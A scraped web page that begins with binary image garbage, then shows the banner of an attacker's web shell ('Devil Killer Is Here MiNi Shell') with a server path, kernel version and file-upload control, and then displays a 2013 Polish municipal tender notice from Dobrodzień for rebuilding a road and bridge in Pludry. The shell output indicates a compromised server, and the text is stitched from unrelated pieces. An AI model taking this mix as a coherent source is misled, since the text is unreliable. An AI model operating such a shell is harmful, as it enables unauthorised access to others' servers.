JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131004/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20131004/404322-N-2013.html

<p class="kh_header"><b>Dobrodzień: Odbudowa odcinka drogi wewnętrznej w Pludrach wraz z odbudową mostu w ciągu tej drogi</b><br>
<b>Numer ogłoszenia: 404322 - 2013; data zamieszczenia: 04.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dobrodzień , Plac Wolności 1, 46-380 Dobrodzień, woj. opolskie, tel. 034 3575100, faks 034 3575100 w. 30.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dobrodzien.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa odcinka drogi wewnętrznej w Pludrach wraz z odbudową mostu w ciągu tej drogi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest odbudowa odcinka drogi wewnętrznej w Pludrach              o długości ok. 325,00 m wraz z obiektem mostowym w ciągu tej drogi. Przedmiotowy odcinek drogi przebiega przez tereny rolne. Zakres robót objętych niniejszym zamówieniem obejmuje:
- niezbędne prace przygotowawcze, w tym oczyszczenie pasa drogowego z zieleni,
- prace   remontowe   na   obiekcie   mostowym   (rozbiórka  zniszczonych  elementów  obiektu mostowego i wykonanie nowych),
- plantowanie poboczy gruntowych,
- wykonanie koryta wraz z profilowaniem podłoża,
- ułożenie warstw konstrukcyjnych jezdni,
- remont przepustów wraz z oczyszczaniem istniejących rowów przydrożnych. 

Szczegółowy zakres robót oraz sposób ich wykonania i odbioru określony jest w dołączonym do SPECYFIKACJI  ISTOTNYCH  WARUNKÓW  ZAMÓWIENIA (SIWZ) przedmiarze robót, projekcie budowlano-wykonawczym oraz specyfikacji technicznej wykonania i odbioru robót budowlanych.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004 r. - Prawo   zamówień publicznych (Dz. U. z 2013 r. poz. 907, z późn. zm.). W zamówieniach tych przewidywany jest zakres wszelkich prac wymienionych                   w sekcji II.1.4, o łącznej wartości nie większej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.00.00-1, 45.23.30.00-9, 45.22.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości 7.000,00 zł (słownie: siedem tysięcy złotych 00/100). 
      Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	 pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,   z   tym że  poręczenie  kasy  jest  zawsze  poręczeniem  pieniężnym,
c)	 gwarancjach bankowych,
d)	 gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2   ustawy z dnia  9  listopada  2000 r.  o  utworzeniu  Polskiej  Agencji  Rozwoju  Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.). 
Potwierdzenie wniesienia wadium (kopia) należy dołączyć do oferty.
Przy wnoszeniu wadium Wykonawca powinien powołać się na nazwę przedmiotu  niniejszego zamówienia. 
Wadium wnoszone w pieniądzu (pkt 1.a) wpłacone za pośrednictwem przelewu, musi być na koncie Zamawiającego: Nr 57 8907 1047 2005 4000 0765 0005 Bank Spółdzielczy w Leśnicy Oddział Dobrodzień do godz. 10:00 do dnia 21.10.2013 r. (włącznie). O wniesieniu przelewu w terminie decydować będzie data i godzina wpływu środków na w/w rachunek bankowy Zamawiającego. Na przelewie Wykonawca powinien podać nr swojego konta,  na które należy zwrócić wadium. Do oferty zaś należy dołączyć (w sposób trwały) potwierdzenie dokonanego przelewu wadium.   
Powyższy rachunek Banku Spółdzielczego w Leśnicy Oddział Dobrodzień jest rachunkiem nie oprocentowanym.
Oryginalny dokument wadialny w pozostałych formach (pkt 1.b - 1.e) należy dołączyć do oferty, jako odrębny dokument niezłączony z ofertą w sposób trwały, zaś kopię tego dokumentu należy w sposób trwały dołączyć do oferty. Dokument wadialny musi zachowywać ważność przez cały okres (30 dni), w którym Wykonawca jest związany ofertą, tj. wraz z upływem terminu składania ofert (21.10.2013 r.) do dnia 19.11.2013 r.
Wykonawca, który w terminie nie wniesie wadium zostanie wykluczony                               z niniejszego   postępowania. 

W przypadku, gdy o niniejsze zamówienie ubiegać się będzie kilku Wykonawców, przy wnoszeniu przez nich wadium w formie gwarancji bankowej lub gwarancji ubezpieczeniowej bądź w obydwóch formach, w dokumentach tych należy ująć nazwy wszystkich Wykonawców, beneficjenta gwarancji, wskazać gwaranta oraz wskazać ich siedziby, pod rygorem wykluczenia oferty spowodowanej brakiem odpowiedniego zabezpieczenia wadium. W przypadku wadium wnoszonego przez nich w pieniądzu, dla Zamawiającego nie będzie miało znaczenia, który                  z Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia je wpłaci</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22 UST. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r.               poz. 907, z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22              UST. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r.              poz. 907, z późn. zm.).

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22              UST. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r.              poz. 907, z późn. zm.).
Wykonawca może polegać na potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22              UST. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r.              poz. 907, z późn. zm.).
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oceny spełniania tego warunku będzie dokonywać Komisja Przetargowa w oparciu o złożone w ofercie OŚWIADCZENIE, ŻE WYKONAWCA SPEŁNIA WARUNKI ZAWARTE W ART. 22              UST. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2013 r.              poz. 907, z późn. zm.).

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takim przypadku zobowiązany będzie udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji niniejszego zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.  FORMULARZ OFERTOWY (załącznik nr 1 do SIWZ). 
       2. ZAKRES RZECZOWY ROBÓT WYKONYWANYCH PRZEZ PODWYKONAWCÓW, jeżeli będą (załącznik nr 3 do SIWZ).     
       3. KOSZTORYS OFERTOWY (starannie przygotowany na podstawie załączonego przedmiaru, tzn. zwierający wszystkie bez wyjątku pozycje i obmiar prac zgodny z tym przedmiarem).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo   zamówień publicznych (Dz. U. z 2013 r. poz. 907,                z późn. zm.) strony dopuszczają możliwość zmiany postanowień Umowy                           w następujących przypadkach: 
a) wystąpienia siły wyższej, epidemii, klęski żywiołowej bądź działań rządowych - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji, 
b)  wystąpienia    szczególnie    niesprzyjających    warunków   atmosferycznych,   utrudniających wykonanie  przedmiotu Umowy w ustalonym terminie, rozumianych jako ciągłe opady deszczu dłuższe  niż  7 dni kalendarzowych, uniemożliwiające prowadzenie robót budowlanych zgodnie  z  przyjętą  technologią, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów - w takim przypadku zmianie ulec może termin realizacji Umowy. Wykonawca wówczas może przedłużyć termin  wykonania  przedmiotu  Umowy  o  czas  opóźnienia,  jeżeli  takie  opóźnienie  jest lub będzie miało wpływ na terminowe wykonanie przedmiotu Umowy. 
O wystąpieniu powyższych okoliczności mogących wpłynąć na zmianę terminów, Wykonawca winien natychmiast pisemnie poinformować Zamawiającego i niezwłocznie odnotować to                w dzienniku budowy; 
c)  wystąpienia    nieprzewidzianych    w    SIWZ   warunków   geologicznych,   archeologicznych, hydrogeologicznych   lub   terenowych,   takich   jak   np.  niewypały  i  niewybuchy,  a  także wystąpienia   innych  nieprzewidzianych  w  SIWZ  przeszkód  lub  skażeń  uniemożliwiających wykonanie robót - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź  termin  jej  realizacji.  O  wystąpieniu  powyższych  okoliczności  mogących  wpłynąć  na zmianę  zakresu  rzeczowego przedmiotu Umowy lub terminu jej realizacji, Wykonawca winien natychmiast pisemnie poinformować Zamawiającego i niezwłocznie odnotować to w dzienniku budowy;
d) odkrycia w trakcie prowadzenia robót stanowisk archeologicznych - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji.                         O wystąpieniu powyższych okoliczności mogących wpłynąć na zmianę zakresu rzeczowego przedmiotu Umowy lub terminu jej realizacji, Wykonawca winien natychmiast pisemnie poinformować Zamawiającego i niezwłocznie odnotować to w dzienniku budowy; 
e) wystąpienia nieprzewidzianych w SIWZ warunków terenowych, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji.                                    O wystąpieniu powyższych okoliczności mogących wpłynąć na zmianę zakresu rzeczowego przedmiotu Umowy lub terminu jej realizacji, Wykonawca winien natychmiast pisemnie poinformować Zamawiającego i niezwłocznie odnotować to w dzienniku budowy;
f) zaistnienia okoliczności leżącej po stronie Zamawiającego, w szczególności konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej (bądź w innych dokumentach budowy), gdyby zastosowanie przewidzianych rozwiązań w tej dokumentacji bądź innych dokumentach budowy, groziło niewykonaniem lub wadliwym wykonaniem przedmiotu Umowy - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy lub zmiana wynagrodzenia na zasadach określonych przez obie strony bądź termin jej realizacji,
g) zaistnienia okoliczności leżącej po stronie Zamawiającego, w szczególności wstrzymania robót przez Zamawiającego bądź jakiegokolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez, lub dających się przypisać Zamawiającemu, bądź Wykonawcy, lub Podwykonawcy zatrudnionemu przez Wykonawcę na terenie budowy - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji, 
h) zaistnienia okoliczności leżącej po stronie Zamawiającego, w szczególności spowodowanej sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub innymi okolicznościami niezależnymi od Zamawiającego oraz Wykonawcy, które nie były możliwe do przewidzenia w chwili zawarcia Umowy, skutkujące niemożliwością prowadzenia robót -                 w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji,
i)  zaistnienia okoliczności będącej następstwem działania organów administracji, w szczególności przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń itp. lub odmowa wydania przez te organy wymaganych decyzji, zezwoleń lub uzgodnień na skutek błędów w dokumentacji projektowej - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy bądź termin jej realizacji,
j) zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia Umowy, okoliczności prawnej (zmiany powszechnie obowiązujących przepisów prawa mającym wpływ na realizacje Umowy), ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującej brakiem możliwości należytego wykonania przedmiotu Umowy, zgodnie z SIWZ - w takim przypadku zmianie ulec może zakres rzeczowy przedmiotu Umowy w zakresie umożliwiającym oddanie przedmiotu Umowy do użytkowania, a Zamawiający może 
ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. Zmianie może ulec także termin realizacji przedmiotu Umowy;
k)  zmiany któregokolwiek z Podwykonawców, na innego niż ci, którzy zostali podani w § 5 ust. 1 Umowy - w takim przypadku zmianie ulec mogą Podwykonawcy wymienieni w § 5 ust. 1 Umowy, po pisemnej akceptacji Zamawiającego, 
l) zmiany zakresu rzeczowego Umowy, który zgodnie z ofertą miał zostać zrealizowany przez  Podwykonawców - w takim przypadku zmianie ulec może zakres wymieniony w § 5 ust. 1 Umowy, po pisemnej akceptacji Zamawiającego,
m) zmiany stawki VAT powodującej zwiększenie kosztów wykonania Umowy po stronie Wykonawcy - w takim przypadku Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę,
n) zmiany stawki VAT powodującej zmniejszenie kosztów wykonania Umowy po stronie Wykonawcy - w takim przypadku Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę.
    Ponadto:
o) Zamawiający przewiduje możliwość zmiany postanowień Umowy w zakresie terminów realizacji poszczególnych czynności w ramach realizacji zamówienia, gdy nie zagraża to prawidłowej realizacji całego zamówienia, a jest uzasadnione usprawnieniem procesu budowlanego bądź warunkami bezpieczeństwa lub decyzją Zamawiającego o dokonaniu zmian w sposobie wykonania nadzorowanych robót budowlanych,
p)  Wykonawca może dokonać zmiany Kierownika budowy przedstawionego w § 8 ust. 2 Umowy, przy pomocy, którego realizuje on przedmiot Umowy, na innego posiadającego, co najmniej równoważne uprawnienia i kwalifikacje, o których mowa w ustawie Prawo budowlane lub innych ustawach, jedynie za uprzednią pisemną zgodą Zamawiającego. 
2.	  Wszelkie zmiany i uzupełnienia Umowy mogą być dokonywane pod rygorem nieważności wyłącznie za zgodą obu stron, wyrażoną w formie pisemnego aneksu podpisanego przez obie strony.
3. Zamawiający może nie wyrazić zgody na dokonanie zmian postanowień Umowy, jeżeli proponowana zmiana może wpłynąć na opóźnienie lub zwiększenie kosztów bądź obniżenie jakości wykonania przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dobrodzien.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dobrodzieniu (pok. nr 1), Plac Wolności 1, 46-380 Dobrodzień.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2013 godzina 10:00, miejsce: Urząd Miejski w Dobrodzieniu, Plac Wolności 1, 46-380 Dobrodzień, woj. opolskie, w Sekretariacie pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zaleca się, aby Wykonawca dokonał wizji terenu i sprawdził na miejscu warunki wykonania niniejszego zamówienia. Zamawiający nie przewiduje zawarcia umowy ramowej. Zamawiający dopuszcza porozumiewanie się drogą elektroniczną na adres: urzad@dobrodzien.pl. Zamawiający nie przewiduje rozliczenia w walutach obcych. Zamawiający nie przewiduje zwrotu kosztów udziału w niniejszym postępowaniu. 

Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy z dnia 29 stycznia 2004 r. - Prawo   zamówień publicznych (Dz. U. z 2013 r. poz. 907, z późn. zm.). Jeżeli Wykonawca przewiduje zlecenie części robót Podwykonawcom, to zobowiązany jest wskazać w ofercie części niniejszego zamówienia, której wykonanie zamierza powierzyć Podwykonawcom (tj. dokładny zakres rzeczowy wykonywanych przez nich robót - załącznik            nr 3 do SIWZ). Wskazanie niniejszego nastąpi w ofercie. Brak informacji oznaczać będzie, iż Wykonawca samodzielnie zrealizuje niniejsze zamówienie. 
